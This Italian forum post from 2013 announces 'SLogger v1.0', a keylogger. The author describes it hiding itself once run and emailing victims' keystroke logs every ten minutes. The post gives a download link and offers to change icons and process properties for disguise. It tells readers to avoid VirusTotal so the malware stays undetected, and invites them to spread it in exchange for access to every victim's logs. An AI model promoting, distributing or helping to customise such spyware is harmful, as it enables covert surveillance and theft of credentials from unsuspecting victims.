[RELEASE] SLogger v1.0

prima leggete le istruzioni

« Older   Newer »
 
  Share  
.
  1.     Like  
     
    .
    Avatar

    HackForFun --MEMBER--

    Group
    Member
    Posts
    234
    Reputation
    0

    Status
    Offline
    SLogger v1.0, la S lo fa sembrare più potente

    ISTRUZIONI

    Funzionamento: una volta eseguito "sparisce" e ogni 10 minuti invia i log alle mail specificate sul mio database.

    Livello di "potenza": OVER NINE THOUSAAAA... no vabbè seriamente, ha funzionato dai pc della mia scuola che devi faticare anche per collegarti a google (kerio firewall) sicuramente funziona anche sul pc dell' utente medio.

    Livello di rilevamento: potenzialmente fud http://chk4me.com/check/public/18j9i1G76dU0f6Z2M1h5L
    La conferma definitiva l' avrei con virustotal che però invia i log delle scansioni alle software house degli antivirus.
    (fatemi il favore di non caricarlo su virustotal)

    Compatibilità: Windows Xp, Windows Vista, Windows 7, Windows 8 su richiesta.

    Come si ricevono i log: posso interagire con le "vittime" specificando a quali indirizzi mail inviare i log, se mi aiutate a diffonderlo aggiungo la vostra mail alla lista di chi riceve i log.

    Cosa ci guadagnate a diffonderlo: avrete accesso non solo ai log della vostra vittima ma anche ai log di tutte le altre, più lo diffondete più ci guadagniamo tutti.

    Avete un' idea potente: contattatemi via PM e possiamo discutere di come implementarla nella prossima release.


    DETTO QUESTO...

    Detto questo, se volete fare parte dei ricevitori di log comunicatemi l' indirizzo mail che volete usare ed iniziate a fare girare il keylogger :D

    Download
    www.mediafire.com/?efwc4355g19q773

    Personalizzazione:
    Su richiesta cambio le proprietà del processo, la dimensione del file, l' icona o ricompilo con il framework 4 per windows 8.
    Se volete cambiare icona non ditemi solo "metti un' icona a forma di supercazzola", inviatemi o linkatemi l' icona che vi interessa o il file con l' icona che vi interessa.

    Crediti:
    serpiccio, il coder (sono io anche se su questo forum mi chiamo con un nome diverso)
    pava, l' esperto di database
    bizo, l' esperto di firewall
    ~
    ..., aggiungerò qui chi mi consiglia funzionalità potenti via pm
     
    .
0 replies since 11/3/2013, 18:57   31 views
  Share  
.